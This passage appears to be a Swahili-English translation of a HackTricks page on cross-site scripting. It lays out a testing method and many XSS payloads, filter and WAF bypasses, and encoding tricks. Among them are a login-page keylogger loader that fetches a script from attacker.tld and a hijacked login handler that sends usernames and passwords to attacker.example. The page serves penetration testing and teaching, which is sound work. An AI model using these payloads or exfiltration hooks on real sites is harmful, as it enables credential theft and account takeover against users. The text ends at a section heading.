XSS (Cross Site Scripting)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Mbinu

1. Angalia ikiwa thamani yoyote unayotawala (parameters, path, headers?, cookies?) inaonyeshwa kwenye HTML au inatumika na msimbo wa JS.
2. Tafuta muktadha ambapo imeonyeshwa/imetumika.
3. Ikiwa imeonyeshwa
4. Angalia ni alama gani unaweza kutumia na kulingana na hiyo, andaa payload:
5. Katika HTML ghafi:
6. Je, unaweza kuunda tags mpya za HTML?
7. Je, unaweza kutumia events au attributes zinazounga mkono protocol ya javascript:?
8. Je, unaweza kuvuka ulinzi?
9. Je, yaliyomo ya HTML yanatafsiriwa na engine yoyote ya JS upande wa mteja (AngularJS, VueJS, Mavo…)? Unaweza kudhulumu Client Side Template Injection.
10. Ikiwa huwezi kuunda tags za HTML zinazotekeleza JS, je, unaweza kudhulumu Dangling Markup - HTML scriptless injection?
11. Ndani ya HTML tag:
12. Je, unaweza kutoka hadi muktadha wa HTML ghafi?
13. Je, unaweza kuunda events/attributes mpya za kutekeleza msimbo wa JS?
14. Je, attribute ambayo umefungwa ndani yake inaunga mkono utekelezaji wa JS?
15. Je, unaweza kuvuka ulinzi?
16. Ndani ya JavaScript code:
17. Je, unaweza kuondoka kwenye tag <script>?
18. Je, unaweza kutoroka kwenye string na kutekeleza msimbo tofauti wa JS?
19. Je, input yako iko katika template literals ``?
20. Je, unaweza kuvuka ulinzi?
21. Javascript function inayotekelezwa
22. Unaweza kuonyesha jina la function itakayotekelezwa. e.g.: ?callback=alert(1)
23. Ikiwa inatumika:
24. Unaweza ku-exploit DOM XSS, zingatia jinsi input yako inavyodhibitiwa na ikiwa input yako inayodhibitiwa inatumiwa na sink yoyote.

Unapofanya kazi kwenye XSS ngumu unaweza kupenda kujua kuhusu:

Debugging Client Side JS

Thamani zilizoonyeshwa

Ili kufanikiwa kutekeleza XSS, jambo la kwanza unalohitaji kupata ni thamani unayodhibiti inayoreflektwa kwenye ukurasa wa wavuti.

• Intermediately reflected: Ikiwa unatambua kuwa thamani ya parameter au hata path inaonyeshwa kwenye ukurasa wa wavuti unaweza ku-exploit Reflected XSS.
• Stored and reflected: Ikiwa unapata thamani unayodhibiti imehifadhiwa kwenye server na inaonyeshwa kila unapofungua ukurasa, unaweza ku-exploit Stored XSS.
• Accessed via JS: Ikiwa unapata thamani unayodhibiti inatumiwa kwa kutumia JS unaweza ku-exploit DOM XSS.

Muktadha

Unapojaribu ku-exploit XSS, jambo la kwanza unalohitaji kujua ni wapi input yako inaonyeshwa. Kulingana na muktadha, utaweza kutekeleza msimbo wa JS kwa njia tofauti.

HTML ghafi

Ikiwa input yako inaonyeshwa kwenye HTML ghafi uta hitaji kutumia baadhi ya HTML tag ili kutekeleza msimbo wa JS: <img , <iframe , <svg , <script … hizi ni baadhi tu ya tags nyingi za HTML unazoweza kutumia.
Pia, kumbuka Client Side Template Injection.

Ndani ya attribute za tag za HTML

Ikiwa input yako inaonyeshwa ndani ya thamani ya attribute ya tag unaweza kujaribu:

1. Kutoroka kutoka kwenye attribute na kutoka kwenye tag (kisha utakuwa kwenye HTML ghafi) na kuunda tag mpya ya HTML ya kutumia: "><img [...]
2. Ikiwa unaweza kutoroka kutoka kwenye attribute lakini si kutoka kwenye tag (> ime-encoded au imeondolewa), kulingana na tag unaweza kuunda event inayotekeleza msimbo wa JS: " autofocus onfocus=alert(1) x="
3. Ikiwa huwezi kutoroka kutoka kwenye attribute (" inafichwa au imeondolewa), basi kulingana na attribute gani thamani yako inaonyeshwa ndani yake na kama unadhibiti thamani yote au sehemu tu utaweza kuitumia. Kwa mfano, ikiwa unadhibiti event kama onclick= utaweza kuifanya itekeleze msimbo yoyote itakapobofiwa. Mfano mwingine wa kuvutia ni attribute href, ambapo unaweza kutumia protocol ya javascript: kutekeleza msimbo: href="javascript:alert(1)"
4. Ikiwa input yako inaonyeshwa ndani ya “tags zisizoweza kufikiwa” unaweza kujaribu ujanja wa accesskey kudhulumu vuln (utahitaji aina fulani ya social engineering ili ku-exploit hili): " accesskey="x" onclick="alert(1)" x="

Attribute-only login XSS nyuma ya WAFs

Ukijumuisha wa SSO wa kampuni ulionyesha parameter ya OAuth service ndani ya attribute ya href ya <a id="forgot_btn" ...>. Ingawa < na > zili-HTML-encode, nukuu za mara mbili haziku-encode, hivyo mshambuliaji angeweza kufunga attribute na kutumia tena elemento ile ile kuingiza handlers kama " onfocus="payload" x=".

1. Inject handler: Payload rahisi kama onclick="print(1)" zilizuiwa, lakini WAF ilikagua tu tamko la kwanza la JavaScript katika inline attributes. Kuongeza usemi usioharibu uliofungwa kwa mabano, kisha alama ya semicolon, kuliruhusu payload halisi kufanyika: onfocus="(history.length);malicious_code_here".
2. Kuileta kwa auto-trigger: Vifaa vya browser vinatoa focus kwa elemento yoyote yenye id inayolingana na fragment, hivyo kuongeza #forgot_btn kwenye URL ya mbinu kulazimisha anchor ipate focus kwenye ku-load kwa ukurasa na kuendesha handler bila hitaji la click.
3. Weka stub ya inline ndogo: Lengo lilimwaga jQuery tayari. Handler ilihitaji tu kuanzisha request kupitia $.getScript(...) wakati keylogger kamili ulikuwa kwenye server ya mshambuliaji.

Kujenga string bila nukuu

Nukuu moja (single quotes) zilirudishwa zikiwa URL-encoded na nukuu mbili zilizokimbizwa ziliharibu attribute, hivyo payload ilitengeneza kila string kwa kutumia String.fromCharCode. Kazi ya msaada inafanya iwe rahisi kubadilisha URL yoyote kuwa char codes kabla ya kuipaste kwenye attribute:

function toCharCodes(str){
return `const url = String.fromCharCode(${[...str].map(c => c.charCodeAt(0)).join(',')});`
}
console.log(toCharCodes('https://attacker.tld/keylogger.js'))

Sifa iliyotokana ilionekana kama:

onfocus="(history.length);const url=String.fromCharCode(104,116,116,112,115,58,47,47,97,116,116,97,99,107,101,114,46,116,108,100,47,107,101,121,108,111,103,103,101,114,46,106,115);$.getScript(url),function(){}"

Kwa nini hili linaiba credentials

Script ya nje (loaded from an attacker-controlled host or Burp Collaborator) ilichomeka document.onkeypress, ilibuffer keystrokes, na kila sekunde ilituma new Image().src = collaborator_url + keys. Kwa sababu XSS inafanyika tu kwa watumiaji wasiotambulishwa, hatua nyeti ni fomu ya login yenyewe—mshambulizi anafanya keylogs usernames and passwords hata kama mwathirika hakubofya “Login”.

Mfano wa ajabu wa Angular ukitekeleza XSS ikiwa unadhibiti class name:

<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>

Ndani ya msimbo wa JavaScript

Katika hali hii, ingizo lako linaonyeshwa kati ya <script> [...] </script> tagi za ukurasa wa HTML, ndani ya faili .js au ndani ya attribute inayotumia protocol ya javascript::

• Ikiwa linaonyeshwa kati ya <script> [...] </script> tagi, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza </script> na kutoroka kutoka kwenye muktadha huu. Hii inafanya kazi kwa sababu kivinjari kitaanza kwanza kutafsiri tagi za HTML kisha yaliyomo, kwa hiyo haitagundua kwamba tagi uliyoingiza ya </script> iko ndani ya msimbo wa HTML.
• Ikiwa linaonyeshwa ndani ya kamba ya JS na mbinu ya mwisho haifanyi kazi utahitaji kutoka kwenye kamba, kuendesha msimbo wako na kujenga upya msimbo wa JS (kama kutakuwa na kosa, hautatekelezwa:
• '-alert(1)-'
• ';-alert(1)//
• \';alert(1)//
• Ikiwa linaonyeshwa ndani ya template literals unaweza kuingiza expressions za JS kwa kutumia syntax ${ ... }: var greetings = `Hello, ${alert(1)}`
• Unicode encode inafanya kazi kuandika valid javascript code:

alert(1)
alert(1)
alert(1)

Javascript Hoisting

Javascript Hoisting inarejelea fursa ya kutangaza functions, variables au classes baada ya kutumika ili uweze kutumia matukio ambapo XSS inatumia variables au functions ambazo hazijatangazwa.
Angalia ukurasa ufuatao kwa maelezo zaidi:

JS Hoisting

Javascript Function

Several web pages have endpoints that accept as parameter the name of the function to execute. A common example to see in the wild is something like: ?callback=callbackFunc.

A good way to find out if something given directly by the user is trying to be executed is modifying the param value (for example to ‘Vulnerable’) and looking in the console for errors like:

In case it’s vulnerable, you could be able to trigger an alert just doing sending the value: ?callback=alert(1). However, it’ very common that this endpoints will validate the content to only allow letters, numbers, dots and underscores ([\w\._]).

However, even with that limitation it’s still possible to perform some actions. This is because you can use that valid chars to access any element in the DOM:

Some useful functions for this:

firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement

Unaweza pia kujaribu kuendesha Javascript functions moja kwa moja: obj.sales.delOrders.

Hata hivyo, kawaida endpoints zinazotekeleza function iliyotajwa hazina DOM yenye mambo ya kuvutia, other pages in the same origin zitakuwa na more interesting DOM za kufanya vitendo zaidi.

Kwa hivyo, ili kunyanyasa udhaifu huu katika DOM tofauti ilitengenezwa exploit ya Same Origin Method Execution (SOME):

SOME - Same Origin Method Execution

DOM

Kuna JS code inayotumia kwa njia isiyo salama baadhi ya data controlled by an attacker kama location.href. Mtu anayevamia anaweza kunyanyasa hili ili kuendesha arbitrary JS code.

DOM XSS

Universal XSS

Aina hizi za XSS zinaweza kupatikana anywhere. Hazitegemei tu unyonyaji wa client wa web application bali kwenye any context. Aina hizi za arbitrary JavaScript execution zinaweza hata kunyanyaswa kupata RCE, read arbitrary files katika clients na servers, na zaidi.
Baadhi ya examples:

Server Side XSS (Dynamic PDF)

Electron Desktop Apps

WAF bypass encoding image

Injecting inside raw HTML

Wakati input yako inarefleka inside the HTML page au unaweza ku-escape na ku-inject HTML code katika muktadha huu, jambo la kwanza unalotakiwa kufanya ni kuangalia kama unaweza kunyanyasa < kuunda tags mpya: Jaribu tu reflect ile char na angalia ikiwa inakuwa HTML encoded au deleted au ikiwa inarefleka without changes. Ni tu katika kesi ya mwisho utakapoweza ku-exploit.
Kwa kesi hizi pia kumbuka Client Side Template Injection.
Kumbuka: A HTML comment can be closed using --> or --!>

Katika kesi hii na ikiwa hakuna black/whitelisting imetumika, unaweza kutumia payloads kama:

<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>

Lakini, ikiwa black/whitelisting ya tags/attributes inatumiwa, utahitaji brute-force which tags unaweza kuunda.
Mara tu utakapogundua tags zipi zinazoruhusiwa, utahitaji brute-force attributes/events ndani ya tags halali ulizopata ili kuona jinsi unaweza kushambulia muktadha.

Tags/Events brute-force

Nenda kwenye https://portswigger.net/web-security/cross-site-scripting/cheat-sheet na bofya Copy tags to clipboard. Kisha, tuma zote kwa kutumia Burp intruder na angalia kama kuna tag yoyote ambayo WAF haikutambua kama hatari. Mara tu utakapo gundua tags unaweza kutumia, unaweza brute force all the events ukitumia tags halali (kwenye ukurasa uleule bofya Copy events to clipboard na fuata taratibu ile ile kama hapo awali).

Custom tags

Iwapo hakuona tag yoyote ya HTML halali, unaweza kujaribu create a custom tag na kutekeleza JS code kwa kutumia attribute ya onfocus. Katika request ya XSS, unahitaji kumaliza URL na # ili kufanya ukurasa focus on that object na execute code:

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

Blacklist Bypasses

Ikiwa aina fulani ya blacklist inatumiwa unaweza kujaribu ku-bypass kwa mbinu za kuchekesha:

//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //

Length bypass (small XSSs)

[!NOTE] > Payload za tiny XSS kwa mazingira tofauti zinaweza kupatikana hapa na hapa.

<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>

Ya mwisho inatumia herufi 2 za Unicode ambazo zinaongezeka kuwa 5: telsr
Zaidi ya herufi hizi zinaweza kupatikana hapa.
Ili kuangalia ni herufi gani zinagawanywa angalia hapa.

Click XSS - Clickjacking

Ikiwa ili ku-exploit udhaifu unahitaji mtumiaji kubonyeza linki au fomu yenye data iliyojazwa kabla unaweza kujaribu abuse Clickjacking (ikiwa ukurasa una udhaifu).

Impossible - Dangling Markup

Ikiwa unadhani kwamba haiwezekani kuunda HTML tag na attribute ili kuendesha JS code, unapaswa kuangalia Danglig Markup kwa sababu unaweza exploit udhaifu bila kuendesha JS code.

Kuingiza ndani ya HTML tag

Ndani ya tagi/kutoroka kutoka kwenye attribute value

Ikiwa uko ndani ya HTML tag, jambo la kwanza unaloweza kujaribu ni kutoroka kutoka kwenye tag na kutumia baadhi ya mbinu zilizotajwa katika sehemu ya awali ili kuendesha JS code.
Ikiwa huwezi kutoka kwenye tag, unaweza kuunda attributes mpya ndani ya tag ili kujaribu kuendesha JS code, kwa mfano kwa kutumia payload kama (kumbuka kwamba katika mfano huu double quotes zimetumika kutoroka kutoka kwenye attribute, hutatahitaji ikiwa input yako inaonekana moja kwa moja ndani ya tag):

" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t

Matukio ya mtindo

<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>

Ndani ya attribute

Hata kama huwezi kutoroka kutoka kwenye attribute (" inafichwa au kufutwa), kutegemea attribute gani thamani yako inarudishwa ndani na ikiwa unadhibiti thamani yote au sehemu tu utaweza kuichafua. Kwa mfano, ikiwa unadhibiti event kama onclick= utaweza kuifanya itekeleze msimbo wowote inapobofiwa.\

Mfano mwingine wa kuvutia ni attribute href, ambapo unaweza kutumia protocol ya javascript: kuendesha msimbo wowote: href="javascript:alert(1)"

Bypass ndani ya event kwa kutumia HTML encoding/URL encode

HTML encoded characters ndani ya thamani za attributes za tag za HTML hurejeshwa (decoded) wakati wa runtime. Kwa hivyo kitu kama kilicho hapa chini kitakuwa halali (payload iko kwa bold): <a id="author" href="http://none" onclick="var tracker='http://foo?&apos;-alert(1)-&apos;';">Go Back </a>

Kumbuka kwamba aina yoyote ya HTML encode ni halali:

//HTML entities
'-alert(1)-'
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>

Kumbuka kwamba URL encode pia itafanya kazi:

<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>

Bypass ndani ya event kwa kutumia Unicode encode

//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />

Protokoli Maalum ndani ya attribute

Huko unaweza kutumia itifaki javascript: au data: katika baadhi ya maeneo ili kutekeleza msimbo wa JS wowote. Baadhi yatahitaji mwingiliano wa mtumiaji, mengine hayatahitaji.

javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==

Maeneo ambapo unaweza kuingiza protokoli hizi

Kwa ujumla protokoli ya javascript: inaweza kutumika katika tagi yoyote inayokubali sifa href na katika tagi nyingi zinazokubali sifa src (lakini si <img)

<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">

Mbinu nyingine za obfuscation

Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu iliyopita pia ni halali kwa kuwa uko ndani ya attribute.

<a href="javascript:var a='&apos;-alert(1)-&apos;'">

Zaidi ya hayo, kuna njia nzuri nyingine kwa kesi hizi: Hata kama ingizo lako ndani ya javascript:... limekuwa URL encoded, lita URL decoded kabla ya kutekelezwa. Kwa hivyo, ikiwa unahitaji escape kutoka kwa string kwa kutumia single quote na unaona kwamba imekuwa URL encoded, kumbuka kwamba haijalishi, itatafsiriwa kama single quote wakati wa utekelezaji.

'-alert(1)-'
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>

Zingatia kwamba ikiwa utajaribu kutumia zote mbili URLencode + HTMLencode kwa mpangilio wowote ili ku-encode payload haiwezi kufanya kazi, lakini unaweza kuwachanganya ndani ya payload.

Kutumia Hex na Octal encode na javascript:

Unaweza kutumia Hex na Octal encode ndani ya attribute ya src ya iframe (angalau) ili kutangaza HTML tags to execute JS:

//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />

Reverse tab nabbing

<a target="_blank" rel="opener"

Ikiwa unaweza kuingiza URL yoyote katika tagi yoyote ya <a href= ambayo ina sifa za target="_blank" and rel="opener", angalia ukurasa ufuatao ili exploit tabia hii:

Reverse Tab Nabbing

on Event Handlers Bypass

Kwanza kabisa angalia ukurasa huu (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) kwa “on” event handlers muhimu.
Ikiwa kuna blacklist inayokuzuia kuunda event handlers hizi, unaweza kujaribu bypass zifuatazo:

<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B

XSS in “Unexploitable tags” (hidden input, link, canonical, meta)

Kutoka here sasa inawezekana kutumia hidden inputs kwa:

<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />

Na katika meta tags:

<!-- Injection inside meta attribute-->
<meta
name="apple-mobile-web-app-title"
content=""
Twitter
popover
id="newsletter"
onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>

Kutoka here: Unaweza kutekeleza XSS payload ndani ya atributi iliyofichwa, mradi unaweza kumshawishi victim kubofya mchanganyiko wa vitufe. Kwenye Firefox Windows/Linux mchanganyiko wa vitufe ni ALT+SHIFT+X na kwenye OS X ni CTRL+ALT+X. Unaweza kutaja mchanganyiko tofauti wa vitufe kwa kutumia kitufe tofauti katika access key attribute. Hapa ni vector:

<input type="hidden" accesskey="X" onclick="alert(1)">

The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x="

Blacklist Bypasses

Mafundi kadhaa ya kutumia encoding mbalimbali yameonyeshwa tayari ndani ya sehemu hii. Rudi nyuma kujifunza wapi unaweza kutumia:

• HTML encoding (HTML tags)
• Unicode encoding (can be valid JS code): \u0061lert(1)
• URL encoding
• Hex and Octal encoding
• data encoding

Bypasses for HTML tags and attributes

Read the Blacklist Bypasses of the previous section.

Bypasses for JavaScript code

Read the JavaScript bypass blacklist of the following section.

CSS-Gadgets

Ikiwa umepata a XSS in a very small part ya tovuti inayohitaji aina fulani ya mwingiliano (labda linki ndogo kwenye footer yenye element ya onmouseover), unaweza kujaribu kubadilisha nafasi ambayo element hiyo inachukua ili kuongeza uwezekano wa linki hiyo kutekelezwa.

For example, you could add some styling in the element like: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5

But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example

.test {display:block; color: blue; width: 100%}

and

#someid {top: 0; font-family: Tahoma;}

Now you can modify our link and bring it to the form

<a href=“” id=someid class=test onclick=alert() a=“”>

This trick was taken from https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703

Kuingiza ndani ya JavaScript code

Katika kesi hizi input yako itaonekana ikirudishwa ndani ya JS code ya faili .js au kati ya <script>...</script> tags au kati ya HTML events zinazoweza kutekeleza JS code au kati ya attributes zinazokubali protocol ya javascript:.

Kutoroka <script> tag

Ikiwa code yako imeingizwa ndani ya <script> [...] var input = 'reflected data' [...] </script> unaweza kwa urahisi kuepuka kufunga <script> tag:

</script><img src=1 onerror=alert(document.domain)>

Kumbuka kwamba katika mfano huu hatujafunga hata single quote. Hii ni kwa sababu HTML parsing hufanywa kwanza na browser, ambayo inajumuisha kutambua vipengele vya ukurasa, ikiwemo blocks za script. Parsing ya JavaScript ili kuelewa na kuendesha scripts zilizowekwa ndani hufanywa tu baadaye.

Inside JS code

Ikiwa <> zinasanitiwa unaweza bado kutoroka string pale ambapo input yako ipo na kutekeleza arbitrary JS. Ni muhimu kurekebisha JS syntax, kwa sababu ikiwa kuna makosa yoyote, JS code haitatekelezwa:

'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//

JS-in-JS string break → inject → repair pattern

Wakati input ya mtumiaji inaingia ndani ya quoted JavaScript string (mfano, server-side echo into an inline script), unaweza kumaliza string, kuingiza code, na kurekebisha syntax ili parsing ibaki valid. Mfano wa jumla:

"            // end original string
;            // safely terminate the statement
<INJECTION>  // attacker-controlled JS
; a = "      // repair and resume expected string/statement

Mfano wa muundo wa URL wakati parameter dhaifu unaporejelezwa ndani ya JS string:

?param=test";<INJECTION>;a="

Hii inatekeleza JS ya mshambulizi bila kuhitaji kugusa muktadha wa HTML (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati vichujio vinapozuia maneno muhimu.

Template literals ``

Ili kujenga strings mbali na single na double quotes, JS pia inakubali backticks ``. Hii inajulikana kama template literals kwa sababu zinaruhusu embedded JS expressions kutumia sintaksi ${ ... }.\
Kwa hivyo, ikiwa unagundua kuwa input yako inarudishwa (reflected) ndani ya JS string inayotumia backticks, unaweza kutumia sintaksi ${ ... } kutekeleza arbitrary JS code:

Hii inaweza kutumika vibaya kwa kutumia:

;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`

// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
return loop
}
loop``

Utekelezaji wa msimbo uliosimbwa

<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>alert(1)</script></svg>  <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">

Payloads zinazoweza kutolewa na eval(atob()) na nuansa za scope

Ili kufanya URLs ziwe fupi na kuzunguka vichujio rahisi vya maneno, unaweza base64-encode mantiki yako halisi na kuitekeleza kwa eval(atob('...')). Ikiwa uchujaji rahisi wa maneno unazuia identifiers kama alert, eval, au atob, tumia Unicode-escaped identifiers ambazo zinajengwa kwa njia ile ile kwenye browser lakini zinaepuka vichujio vinavyolingana na string:

\u0061\u006C\u0065\u0072\u0074(1)                      // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64'))  // eval(atob('...'))

Tofauti muhimu ya scoping:

const/let zilizotangazwa ndani ya eval() zina block-scoped na hazitaundi globals; hazitaonekana kwa scripts za baadaye. Tumia elementi ya <script> iliyowekwa kwa wakati wa utekelezaji ili kufafanua global, non-rebindable hooks inapohitajika (e.g., to hijack a form handler):

var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);

Marejeo: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Utekelezaji wa JS (Unicode Encode)

alert(1)
alert(1)
alert(1)

JavaScript bypass blacklists techniques

Strings

"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))

Escapes maalum

"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself

Ubadilisho wa nafasi ndani ya msimbo wa JS

<TAB>
/**/

JavaScript comments (kutoka JavaScript Comments njia)

//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line

JavaScript new lines (kutoka kwa JavaScript new line mbinu)

//Javascript interpret as new line these chars:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9

Nafasi nyeupe za JavaScript

